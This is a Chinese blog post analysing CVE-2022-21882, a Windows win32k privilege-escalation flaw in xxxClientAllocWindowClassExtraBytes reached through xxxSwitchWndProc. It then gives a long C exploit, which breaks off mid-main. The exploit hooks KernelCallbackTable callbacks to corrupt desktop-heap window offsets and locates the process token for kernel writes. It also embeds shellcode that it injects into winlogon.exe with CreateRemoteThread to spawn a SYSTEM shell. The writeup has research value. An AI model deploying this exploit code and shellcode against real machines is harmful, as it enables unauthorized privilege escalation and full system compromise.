CVE-2022-21882 分析&POC

最新推荐文章于 2024-05-07 08:44:28 发布
最新推荐文章于 2024-05-07 08:44:28 发布
阅读量2.1k 收藏 6
点赞数 2
分类专栏: 总结 漏洞复现与分析 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41252520/article/details/124506261
版权

0x0 漏洞描述

该漏洞的成因和CVE-2021-1732类似,如果不了解,请先阅读我之前的分析:https://blog.csdn.net/qq_41252520/article/details/119349398

主要因为 x x x C l i e n t A l l o c E x t r a B y t e s F u n c \textcolor{cornflowerblue}{xxxClientAllocExtraBytesFunc} xxxClientAllocExtraBytesFunc函数会回调用户空间中的

u s e r 32 ! _ x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{user32!\_xxxClientAllocWindowClassExtraBytes} user32!_xxxClientAllocWindowClassExtraBytes,攻击者可以在此过程中设置目标窗口的 ExtraBytes指针为任意值,并且修改该指针的寻址方式为 桌面堆+偏移,以实现桌面堆的越界写。在CVE-2021-1732中,只有 x x x C r e a t e W i n d o w s E x \textcolor{cornflowerblue}{xxxCreateWindowsEx} xxxCreateWindowsEx函数中会调用 x x x C l i e n t A l l o c E x t r a B y t e s F u n c \textcolor{cornflowerblue}{xxxClientAllocExtraBytesFunc} xxxClientAllocExtraBytesFunc,后微软推出了针对该漏洞的补丁。后面小节会分析为什么打了补丁的 x x x C l i e n t A l l o c E x t r a B y t e s F u n c \textcolor{cornflowerblue}{xxxClientAllocExtraBytesFunc} xxxClientAllocExtraBytesFunc还会造成CVE-2022-21882漏洞。

0x1 影响版本

Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems

0x2 漏洞等级

7.8 | 高危

0x3 漏洞分析

【环境】win10x64_21H2 19044.1415

首 先 要 从 C V E − 2021 − 1732 的 补 丁 分 析 说 起 \textcolor{green}{首先要从CVE-2021-1732的补丁分析说起} CVE20211732

安装补丁后, x x x C r e a t e W i n d o w E x \textcolor{cornflowerblue}{xxxCreateWindowEx} xxxCreateWindowEx在调用 x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{xxxClientAllocWindowClassExtraBytes} xxxClientAllocWindowClassExtraBytes后增添了一个检查:

__int64 __fastcall xxxCreateWindowEx(int a1, wchar_t *a2, __int64 a3, __int64 a4, unsigned int a5, unsigned int a6, int a7, unsigned int a8, unsigned int a9, __int64 a10, __int64 a11, __int64 a12, __int64 a13, __int64 a14, int a15, int a16, __int64 a17)
{
    ...
    LABLE_543:
    ...
        goto LABEL_544;
    LABEL_544:
    ...
        xxxFreeWindow(v50);
    ...
        goto LABEL_37;
    LABEL_37:
        SmartObjStackRef<tagMENU>::~SmartObjStackRef<tagMENU>(&v308);
        SmartObjStackRef<tagCLS>::~SmartObjStackRef<tagCLS>(&v303);
        return 0i64;
    ...
    cbExtraBytes = *(unsigned int *)(*((_QWORD *)v50 + 5) + 0xC8i64);
    if ( !(_DWORD)cbExtraBytes )
        goto LABEL_211;
    ExtraBytes = xxxClientAllocWindowClassExtraBytes(cbExtraBytes);// 易受攻击的函数
    v405 = ExtraBytes;
    if ( !ExtraBytes )
    {
        v301 = 2;
        if ( *((_DWORD *)v50 + 2) != 1 )
            goto LABEL_542;
        goto LABEL_197;
    }
    if ( (unsigned int)IsWindowBeingDestroyed((__int64)v50)
        || *(_BYTE *)(_HMPheFromObject(v96) + 0x19) & 1
        || (v352 = 0i64, tagWND::RedirectedFieldpExtraBytes::operator!=<unsigned __int64>((__int64)v50 + 0x140, &v352)) )// tagWND->ExtraBytes != 0
    {
        LABEL_542:
        v121 = v301;
        goto LABEL_543;
    }
    tagWND_1 = *((_QWORD *)v50 + 5);
    if ( *(_DWORD *)(tagWND_1 + 0xE8) & 0x800 )
    {
        MicrosoftTelemetryAssertTriggeredNoArgsKM();
        tagWND_1 = v306[5];
    }
    *(_QWORD *)(tagWND_1 + 0x128) = ExtraBytes;
}
  • 正常情况下,在新创建一个窗口还没调用 x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{xxxClientAllocWindowClassExtraBytes} xxxClientAllocWindowClassExtraBytes的时候,其窗口对应的 t a g W N D − > E x t r a B y t e s \textcolor{orange}{tagWND->ExtraBytes} tagWND>ExtraBytes自然是空的,所以通过 @line:31的判断语句就能检测到目标窗口的 ExtraBytes指针是否在回调过程中被修改,推测出用户态回调是否被 HOOK。如果检查到非正常修改就会转到 @line:4的流程,释放掉新建的窗口,并返回失败。
  • 然而这样一个补丁居然是打在 x x x C r e a t e W i n d o w E x \textcolor{cornflowerblue}{xxxCreateWindowEx} xxxCreateWindowEx函数里的,且 x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{xxxClientAllocWindowClassExtraBytes} xxxClientAllocWindowClassExtraBytes函数并没有做任何修改,当然这在当时的系统没有任何问题,但是有意思的是在后来的更新中, x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{xxxClientAllocWindowClassExtraBytes} xxxClientAllocWindowClassExtraBytes又多了几个触发的路径
    • 在这里插入图片描述

__int64 __fastcall xxxSwitchWndProc(struct tagWND *a1, int a2, unsigned __int64 a3, __int64 a4)
{
    ...
    *((_QWORD *)v7 + 0x23) = v15;
    *(_DWORD *)(*(_QWORD *)v8 + 0xFCi64) = v14;
    cbExtraBytes = *(unsigned int *)(*(_QWORD *)v8 + 0xC8i64);
    v28 = cbExtraBytes;
    if ( (_DWORD)cbExtraBytes )
    {
        ret = (void *)xxxClientAllocWindowClassExtraBytes((unsigned int)cbExtraBytes);
        if ( !ret )
            return 0i64;
    }
    else
    {
        ret = 0i64;
    }
    if ( tagWND::RedirectedFieldpExtraBytes::operator<bool> bool((__int64)v7 + 0x140) )// tagWND->ExtraBytes != NULL
    {
        if ( ret )
            memmove(
            ret,
            (const void *)(*(_QWORD *)(*(_QWORD *)v8 + 0x128i64) + *(unsigned int *)(*(_QWORD *)v8 + 0xFCi64)),
            cbExtraBytes);
        tagWND = *((_QWORD *)v7 + 5);
        ExtraBytes = *(_QWORD *)(tagWND + 0x128);
        *(_QWORD *)(tagWND + 0x128) = ret;
        *(_DWORD *)(*((_QWORD *)v7 + 5) + 0xC8i64) = cbExtraBytes;
        xxxClientFreeWindowClassExtraBytes((__int64)v7, ExtraBytes);
    }
    ...
}

@line:8 当被切换的目标窗口的 cbExtraBytes大于 0时,就会调用易受攻击的函数

x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{xxxClientAllocWindowClassExtraBytes} xxxClientAllocWindowClassExtraBytes为窗口分配额外内存,后面却没有检查窗口的 ExtraBytes在用户层回调过程中是否遭到修改。因此,同样的问题又发生了!并且这个漏洞更容易利用,因为窗口已经创建完毕,我们可以轻松拿到窗口的句柄。

需要注意的是,当分配了额外内存,并拷贝完数据后,就会释放掉额外内存。 @line:29

0x4 漏洞利用

整个利用过程可以用一张图来表示

在这里插入图片描述

首先应用层可以通过调用 N t U s e r M e s s a g e C a l l \textcolor{cornflowerblue}{NtUserMessageCall} NtUserMessageCall函数触发内核层的 x x x S w i t c h W n d P r o c \textcolor{cornflowerblue}{xxxSwitchWndProc} xxxSwitchWndProc函数,接着就会调用到易受攻击的函数 x x x C l i e n t A l l o c W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{xxxClientAllocWindowClassExtraBytes} xxxClientAllocWindowClassExtraBytes。我们事先在应用层 Hook相应的回调函数,然后就是调用函数 N t U s e r C o n s o l e C o n t r o l \textcolor{cornflowerblue}{NtUserConsoleControl} NtUserConsoleControl修改 tagWND_TriggerExtraBytes内存寻址方式为 桌面堆+偏移,然后调用函数 N t C a l l b a c k R e t u r n \textcolor{cornflowerblue}{NtCallbackReturn} NtCallbackReturn将受害者窗口相对于桌面堆的偏移 tagWND_Victim offset设置为 t a g W N D _ T r i g g e r − > E x t r a B y t e s \textcolor{orange}{tagWND\_Trigger->ExtraBytes} tagWND_Trigger>ExtraBytes

还要 Hook应用层的 U s e r 32 ! _ x x x C l i e n t F r e e W i n d o w C l a s s E x t r a B y t e s \textcolor{cornflowerblue}{User32!\_xxxClientFreeWindowClassExtraBytes} User32!_xxxClientFreeWindowClassExtraBytes,使其不释放 t a g W N D _ T r i g g e r − > E x t r a B y t e s \textcolor{orange}{tagWND\_Trigger->ExtraBytes} tagWND_Trigger>ExtraBytes,保证进一步的漏洞利用能够顺利进行。

触发漏洞的窗口(hTrigger)和受害者窗口(hVictim)在内存上的布局应遵循下图所示的方式:

在这里插入图片描述

hVictim在内存地址低处,hTrigger在内存地址高处。通过前一张图中的漏洞利用流程,修改 hTrigger t a g W N D − > F l a g s   ∣ =   0 x 800 \textcolor{orange}{tagWND->Flags\ |=\ 0x800} tagWND>Flags = 0x800,并设置 tagWND_Victim相对于桌面堆的偏移为 t a g W N D T r i g g e r − > E x t r a B y t e s \textcolor{orange}{tagWND_Trigger->ExtraBytes} tagWNDTrigger>ExtraBytes,然后对 hWndTrigger调用 S e t W i n d o w L o n g \textcolor{cornflowerblue}{SetWindowLong} SetWindowLong系列的函数,越界修改 t a g W N D _ V i c t i m − > E x t r a B y t e s \textcolor{orange}{tagWND\_Victim->ExtraBytes} tagWND_Victim>ExtraBytes为任意内存,再对 hWndVictim调用 S e t W i n d o w L o n g \textcolor{cornflowerblue}{SetWindowLong} SetWindowLong系列的函数便可实现任意内存写。

获得任意内核地址写之后,我们可以修改当前进程的 T o k e n − > P r i v i l e g e s \textcolor{orange}{Token->Privileges} Token>Privileges,开启全部权限,然后注入 shellcodewinlong.exe获得一个系统用户的 shell

最后不要忘了恢复 t a g W N D _ V i c t i m − > E x t r a B y t e s \textcolor{orange}{tagWND\_Victim->ExtraBytes} tagWND_Victim>ExtraBytes t a g W N D T r i g g e r − > F l a g s \textcolor{orange}{tagWND_Trigger->Flags} tagWNDTrigger>Flags,避免系统 BSOD

0x5 EXP

#include<windows.h>
#include<stdio.h>
#include<stdlib.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib ")

#define KERNEL_CALLBACK_TABLE_OFFSET 0x58
#define TRIGGERWND_EXTRASIZE 0xABCD
#define STATUS_INFO_LENGTH_MISMATCH  ((NTSTATUS)0xC0000004L) 

#pragma pack(1)
typedef struct 
{
	ULONG64 hWnd;                // + 0x00
	ULONG64 OffsetToDesktopHeap; // + 0x08
	ULONG64 state;               // + 0x10
	DWORD dwExStyle;             // + 0x18
	DWORD dwStyle;               // + 0x1C
	BYTE padd1[0xa8];
	ULONG64 cbWndExtra;          // + 0xC8
	BYTE padd2[0x18];
	DWORD dwExtraFlag;           // + 0xE8
	BYTE padd3[0x3c];
	ULONG64 pExtraBytes;         // + 0x128
}tagWNDK,*PWND;

#pragma pack(0)

typedef struct _SYSTEM_HANDLE
{
	PVOID Object;
	HANDLE UniqueProcessId;
	HANDLE HandleValue;
	ULONG GrantedAccess;
	USHORT CreatorBackTraceIndex;
	USHORT ObjectTypeIndex;
	ULONG HandleAttributes;
	ULONG Reserved;
} SYSTEM_HANDLE, * PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
	ULONG_PTR HandleCount;
	ULONG_PTR Reserved;
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

enum SYSTEM_INFORMATION_CLASS {
	SystemExtendedHandleInformation = 64
};

using NtUserMessageCall_t = NTSTATUS(*)(
	HWND hWnd,
	UINT Msg,
	WPARAM wParam,
	LPARAM lParam,
	ULONG_PTR ResultInfo,
	DWORD dwType,
	BOOL bAnsi);

using ZwQuerySystemInformation_t = NTSTATUS(*)(
	SYSTEM_INFORMATION_CLASS SystemInformationClass,
	PVOID SystemInformation,
	ULONG SystemInformationLength,
	PULONG ReturnLength);

using RtlAllocateHeap_t = PVOID(*)(PVOID HeapHandle, ULONG Flags, SIZE_T Size);

using xxxClientAllocWindowClassExtraBytes_t = NTSTATUS(*)(PDWORD Length);
using xxxClientFreeWindowClassExtraBytes_t = NTSTATUS(*WINAPI)(PVOID* pInfo);

using NtUserConsoleControl_t = NTSTATUS(__fastcall*)(DWORD64, LPVOID, DWORD);
using NtCallbackReturn_t = NTSTATUS(__fastcall*)(LPVOID, DWORD, NTSTATUS);
using HMValidateHandle_t = tagWNDK*(__fastcall*)(HANDLE, UINT);
using IsMenu_t = BOOL(*)(HMENU hMenu);

namespace gb {
	xxxClientAllocWindowClassExtraBytes_t xxxClientAllocWindowClassExtraBytes = 0;
	xxxClientFreeWindowClassExtraBytes_t xxxClientFreeWindowClassExtraBytes = 0;
	NtUserConsoleControl_t NtUserConsoleControl = 0;
	NtCallbackReturn_t NtCallbackReturn = 0;
	HMValidateHandle_t HMValidateHandle = 0;
	NtUserMessageCall_t  NtUserMessageCall = 0;
	ZwQuerySystemInformation_t ZwQuerySystemInformation = 0;
	RtlAllocateHeap_t RtlAllocateHeap = 0;

	IsMenu_t u32_IsMenu = 0;
	HMODULE g_hNtdll = 0;
	HMODULE g_hWin32u = 0;
	HMODULE g_hUser32 = 0;

	HWND g_hTriggerWnd = 0;
	HWND g_hVictimWnd = 0;

	DWORD64 TriggerDeskHeap = 0;
	DWORD64 VictimDeskHeap = 0;
	HANDLE hToken = 0;
};


VOID SetFuncHook(DWORD64 newAllocFunc,DWORD64 newFreeFunc) {
	//1.获取本进程的PEB
	DWORD64 ulCurrPEB = __readgsqword(0x60);
	printf("[+] Found ulCurrPEB = 0x%p\n", ulCurrPEB);
	//2.找到KernelCallbackTable
	DWORD64 KernelCallbackTable = ulCurrPEB + KERNEL_CALLBACK_TABLE_OFFSET;
	KernelCallbackTable = *(PDWORD64)KernelCallbackTable;
	printf("[+] Found KernelCallbackTable = 0x%p\n", KernelCallbackTable);
	DWORD64  xxxClientAllocExtraBytesFunc = *(PDWORD64)((DWORD64)KernelCallbackTable + 0x7B * 8);
	printf("[+] Found xxxClientAllocExtraBytesFunc = 0x%p\n", xxxClientAllocExtraBytesFunc);
	gb::xxxClientAllocWindowClassExtraBytes = (xxxClientAllocWindowClassExtraBytes_t)xxxClientAllocExtraBytesFunc;

	DWORD64  xxxClientFreeExtraBytesFunc = *(PDWORD64)((DWORD64)KernelCallbackTable + 0x7C * 8);
	printf("[+] Found xxxClientFreeExtraBytesFunc = 0x%p\n", xxxClientFreeExtraBytesFunc);
	gb::xxxClientFreeWindowClassExtraBytes = (xxxClientFreeWindowClassExtraBytes_t)xxxClientFreeExtraBytesFunc;

	//3.HOOK
	//首先需要设置页面可写属性
	DWORD dwOldProtect;
	VirtualProtect((LPVOID)((DWORD64)KernelCallbackTable + 0x7B * 8), 0x300, PAGE_EXECUTE_READWRITE, &dwOldProtect);
	*(PDWORD64)((DWORD64)KernelCallbackTable + 0x7B * 8) = newAllocFunc;
	VirtualProtect((LPVOID)((DWORD64)KernelCallbackTable + 0x7B * 8), 0x300, dwOldProtect, &dwOldProtect);

	VirtualProtect((LPVOID)((DWORD64)KernelCallbackTable + 0x7C * 8), 0x300, PAGE_EXECUTE_READWRITE, &dwOldProtect);
	*(PDWORD64)((DWORD64)KernelCallbackTable + 0x7C * 8) = newFreeFunc;
	VirtualProtect((LPVOID)((DWORD64)KernelCallbackTable + 0x7C * 8), 0x300, dwOldProtect, &dwOldProtect);
}

NTSTATUS WINAPI ClientFreeWindowsClassExtraBytesProxy(PVOID* pInfo) {
	PWND pwnd = (PWND)pInfo[0];
	if (pwnd->cbWndExtra == TRIGGERWND_EXTRASIZE)
		return 1;
	return gb::xxxClientFreeWindowClassExtraBytes(pInfo);
}

NTSTATUS WINAPI ClientAllocatWindowClassExtraBytesProxy(PDWORD size) {
	
	if (*size==TRIGGERWND_EXTRASIZE) {
		//获取窗口句柄
		//使用NtUserConsoleControl 将目标窗口的寻址模式修改为DesktopHeap+Offset
		printf("[+] ClientAllocatWindowClassExtraBytesProxy called! Offset = %p\n\n", gb::VictimDeskHeap);
		gb::NtUserConsoleControl(6, &gb::g_hTriggerWnd, 0x10);
		//修改hWndTriggle 的 tagWnd->ExtraBytes 为 hTriggerWnd的桌面堆
		DWORD64 ulResult = gb::VictimDeskHeap ;
		return gb::NtCallbackReturn(&ulResult, 24, 0);
	}
	return gb::xxxClientAllocWindowClassExtraBytes(size);
}

LRESULT __fastcall WindowProc(HWND a1, UINT a2, WPARAM a3, LPARAM a4)
{
	if (a2 != 2)
		return DefWindowProcW(a1, a2, a3, a4);
	PostQuitMessage(0);
	return 0;
}

bool CheckPrivilege(HANDLE TokenHandle)
{
	BOOL isPrivilegeSet = FALSE;
	PRIVILEGE_SET		privSet;
	LUID_AND_ATTRIBUTES Privileges[1];
	LookupPrivilegeValue(NULL, "SeDebugPrivilege", &(Privileges[0].Luid));
	Privileges[0].Attributes = 0;

	privSet.PrivilegeCount = 1;
	privSet.Control = PRIVILEGE_SET_ALL_NECESSARY;
	memcpy(privSet.Privilege, Privileges, sizeof(Privileges));

	PrivilegeCheck(TokenHandle, &privSet, &isPrivilegeSet);
	return isPrivilegeSet;
}

DWORD getProcessId(const char* name)
{
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;

	if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
	{
		printf("[Error_%d] EnumProcess failed...\n", __LINE__);
		exit(0);
	}


	// Calculate how many process identifiers were returned.
	cProcesses = cbNeeded / sizeof(DWORD);

	// Print the name and process identifier for each process.
	for (i = 0; i < cProcesses; i++)
	{
		if (aProcesses[i] != 0)
		{
			DWORD processID = aProcesses[i];
			CHAR szProcessName[MAX_PATH] = "<unknown>";

			// Get a handle to the process.

			HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
				PROCESS_VM_READ,
				FALSE, processID);

			// Get the process name.

			if (NULL != hProcess)
			{
				HMODULE hMod;
				DWORD cbNeeded;

				if (EnumProcessModules(hProcess, &hMod, sizeof(hMod),
					&cbNeeded))
				{
					GetModuleBaseNameA(hProcess, hMod, szProcessName,
						sizeof(szProcessName) / sizeof(TCHAR));
				}
			}

			// Print the process name and identifier.
			if (!lstrcmpA(szProcessName, name))
			{
				CloseHandle(hProcess);
				return (processID);
			}

			// Release the handle to the process.

			CloseHandle(hProcess);
		}
	}

	return 0;

}

void SpawnShell() {
	HANDLE hSystemProcess = INVALID_HANDLE_VALUE;
	PVOID  pLibRemote;
	HMODULE hKernel32 = GetModuleHandleA("Kernel32");
	DWORD processID;
	unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
		"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
		"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
		"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
		"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
		"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
		"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
		"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
		"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
		"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
		"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
		"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
		"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
		"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
		"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
		"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
		"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
		"\x78\x65\x00";


	if ((processID = getProcessId("winlogon.exe")) == 0)
	{
		printf("[Error_%d] Couldn't retrieve process ID...\n", __LINE__);
		return;
	}
	printf("[+] Retrieved process id: %d\n", processID);
	hSystemProcess = OpenProcess(GENERIC_ALL, false, processID);

	if (hSystemProcess == INVALID_HANDLE_VALUE || hSystemProcess == (HANDLE)0)
	{
		printf("[Error_%d] Couldn't open system process...\n", __LINE__);
		return;
	}
	printf("[+] Got a handle on a system Process: %08p\n", hSystemProcess);


	pLibRemote = VirtualAllocEx(hSystemProcess, NULL, sizeof(shellcode) * 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!pLibRemote)
	{
		printf("[Error_%d] Virtual alloc failed !\n", __LINE__);
		return;
	}

	printf("[+] Allocation in system process succeded with address %08p\n", pLibRemote);

	if (!WriteProcessMemory(hSystemProcess, pLibRemote, shellcode, sizeof(shellcode), NULL))
	{
		printf("[Error_%d] WriteProcessMemory failed !\n", __LINE__);
		return;
	}

	HANDLE hThread = CreateRemoteThread(hSystemProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLibRemote, NULL, 0, NULL);

	printf("[+] Writing in system process succeded\n");

	if (hThread == NULL) {
		printf("[Error_%d] CreateRemoteThread failed !\n", __LINE__);
		return;
	}
	else
		printf("[+] Remote thread created !\n");
	CloseHandle(hSystemProcess);
}

ULONG64 GetToken() {
	PSYSTEM_HANDLE_INFORMATION_EX sys_handle_info_ref = NULL;
	ULONG64 Token = 0;
	ULONG len = 20;
	NTSTATUS ntst = 0;

	OpenProcessToken(GetCurrentProcess(), GENERIC_READ, &gb::hToken);
	if (gb::hToken == INVALID_HANDLE_VALUE) {
		printf("[Error_%d] GetToken(): OpenProcessToken failed.\n", __LINE__);
		return 0;
	}
	//获取本进程的EPROCESS
	do {
		len *= 2;
		sys_handle_info_ref = (PSYSTEM_HANDLE_INFORMATION_EX)realloc(sys_handle_info_ref, len);
		ntst = gb::ZwQuerySystemInformation(
			(SYSTEM_INFORMATION_CLASS)SystemExtendedHandleInformation, sys_handle_info_ref, len, &len);
	} while (ntst == STATUS_INFO_LENGTH_MISMATCH);

	if (ntst != 0) {
		printf("[Error_%d] GetToken(): ZwQuerySystemInformation failed.\n", __LINE__);
		if (sys_handle_info_ref)
			free(sys_handle_info_ref);
		return 0;
	}

	DWORD pid = GetCurrentProcessId();
	for (int i = 0; i < sys_handle_info_ref->HandleCount; i++) {
		if (gb::hToken == sys_handle_info_ref->Handles[i].HandleValue
			&& (HANDLE)pid == sys_handle_info_ref->Handles[i].UniqueProcessId) {
			Token = (ULONG64)sys_handle_info_ref->Handles[i].Object;
			break;
		}
	}

	if (sys_handle_info_ref)
		free(sys_handle_info_ref);

	printf("[+] Found current process token = %p\n", Token);
	return Token;
}


BOOLEAN Init() {
	BOOLEAN bRet = TRUE;
	int offset = 0;
	DWORD64 next_code = 0;

	__try {
		gb::g_hUser32 = LoadLibraryA("user32.dll");
		if (!gb::g_hUser32) {
			printf("[!] Error: %d, Code = 0x%p", __LINE__, GetLastError());
			bRet = FALSE;
			__leave;
		}
		//获取u32_IsMenu
		gb::u32_IsMenu = (IsMenu_t)GetProcAddress(gb::g_hUser32, "IsMenu");
		if (!gb::u32_IsMenu) {
			printf("[!] Error: %d, Code = 0x%p", __LINE__, GetLastError());
			bRet = FALSE;
			__leave;
		}

		for (int i = 0; i < 0x100; i++) {
			PUCHAR tr = (PUCHAR)gb::u32_IsMenu + i;
			if (*tr == 0xE8)
			{//找到调用HMValidateHandle的指令位置
				offset = *(int*)((PCHAR)gb::u32_IsMenu + i + 1);
				next_code = (DWORD64)gb::u32_IsMenu + i + 5;
				gb::HMValidateHandle = (HMValidateHandle_t)(next_code + offset);
				break;
			}
		}
		if (!gb::HMValidateHandle) {
			printf("[!] Error: Can not find HMValidateHandle!\n");
			bRet = FALSE;
			__leave;
		}

		printf("[+] Found HMValidateHandle = 0x%p\n", gb::HMValidateHandle);

		gb::g_hNtdll = LoadLibraryA("ntdll.dll");
		if (!gb::g_hNtdll) {
			printf("[!] Error: %d, Code = 0x%p", __LINE__, GetLastError());
			bRet = FALSE;
			__leave;
		}

		gb::g_hWin32u = LoadLibraryA("win32u.dll");
		if (!gb::g_hWin32u) {
			printf("[!] Error: %d, Code = 0x%p", __LINE__, GetLastError());
			bRet = FALSE;
			__leave;
		}
		
		gb::NtCallbackReturn = (NtCallbackReturn_t)GetProcAddress(gb::g_hNtdll, "NtCallbackReturn");
		gb::NtUserMessageCall = (NtUserMessageCall_t)GetProcAddress(gb::g_hWin32u, "NtUserMessageCall");
		gb::NtUserConsoleControl = (NtUserConsoleControl_t)GetProcAddress(gb::g_hWin32u, "NtUserConsoleControl");
		gb::ZwQuerySystemInformation = (ZwQuerySystemInformation_t)GetProcAddress(gb::g_hNtdll, "NtQuerySystemInformation");
		gb::RtlAllocateHeap = (RtlAllocateHeap_t)GetProcAddress(gb::g_hNtdll, "RtlAllocateHeap");
		if (gb::NtCallbackReturn==0 || gb::NtUserMessageCall==0 || 
			gb::NtUserConsoleControl==0 || gb::ZwQuerySystemInformation==0 ||
			gb::RtlAllocateHeap==0) {
			printf("[!] Error: %d, Code = 0x%p", __LINE__, GetLastError());
			bRet = FALSE;
			__leave;
		}
	}
	__finally {

	}
	return bRet;
}

int main(int argc,char *argv[]) {

	if (argc <= 1) {
		printf(
		"Usage:\n"
		"         Example: CVE-2022-21882.exe whoami\n"
		);
		return 0;
	}

	WNDCLASSEXW WndClassExW = { 0 };

	ULONG64 TokenAddr = 0;

	if (Init()) {

		TokenAddr = GetToken();

		if (TokenAddr == 0) {
			printf("[-] Error(%u): GetToken failed.\n");
			return 0;
		}

		WndClassExW.hIcon = 0;
		WndClassExW.hbrBackground = 0;
		WndClassExW.lpszClassName = 0;
		WndClassExW.lpfnWndProc = (WNDPROC)WindowProc;
		WndClassExW.cbSize = sizeof(WNDCLASSEXW);
		WndClassExW.style = CS_VREDRAW | CS_HREDRAW;;
		WndClassExW.cbClsExtra = 0;
		WndClassExW.cbWndExtra = 0x60;
		WndClassExW.hInstance = GetModuleHandleW(0);
		WndClassExW.lpszClassName = L"VictimClass";
		//被覆盖写
		ATOM atom_vic = RegisterClassExW(&WndClassExW);

		WndClassExW.cbWndExtra = TRIGGERWND_EXTRASIZE;
		WndClassExW.lpszClassName = L"TriggerClass";

		//触发漏洞
		ATOM atom_trig = RegisterClassExW(&WndClassExW);

		gb::g_hVictimWnd = CreateWindowExW(NULL,
			(LPCWSTR)(unsigned __int16)atom_vic,
			L"VictimWnd",
			NULL,
			0,
			0, 
			0,
			0,
			0,
			0,
			GetModuleHandleW(0),
			0);
		printf("[+] Created victim windows = 0x%p\n", gb::g_hVictimWnd);

		gb::g_hTriggerWnd = CreateWindowExW(NULL,
			(LPCWSTR)(unsigned __int16)atom_trig,
			L"TriggerBug",
			NULL,
			0,
			0,
			0,
			0,
			0,
			0,
			GetModuleHandleW(0),
			0);
		printf("[+] Created trigger windows = 0x%p\n", gb::g_hTriggerWnd);
		// 触发漏洞
		// 获取刚创建的这两个窗口的桌面堆
		PWND Trigger= gb::HMValidateHandle(gb::g_hTriggerWnd, 1);
		gb::TriggerDeskHeap = Trigger->OffsetToDesktopHeap;
		printf("[+] TriggerDeskHeap's tagWND = 0x%p\n", Trigger);
		PWND Victim = gb::HMValidateHandle(gb::g_hVictimWnd, 1);
		gb::VictimDeskHeap = Victim->OffsetToDesktopHeap;
		DWORD64 Distance = 0;
		if (gb::VictimDeskHeap> gb::TriggerDeskHeap) {
			Distance=gb::VictimDeskHeap - gb::TriggerDeskHeap;
		}
		else {
			Distance = gb::TriggerDeskHeap - gb::VictimDeskHeap;
		}

		if (Distance >= TRIGGERWND_EXTRASIZE) {
			printf("[-] Heap spray failed!\n");
			return 0;
		}

		printf("[+] VictimDeskHeap's tagWND = 0x%p\n", Victim);
		printf("[+] TriggerDeskHeap = %p\n", gb::TriggerDeskHeap);
		printf("[+] VictimDeskHeap = %p\n", gb::VictimDeskHeap);

		// 代理回调函数
		SetFuncHook((DWORD64)ClientAllocatWindowClassExtraBytesProxy,(DWORD64)ClientFreeWindowsClassExtraBytesProxy);
		// 触发漏洞
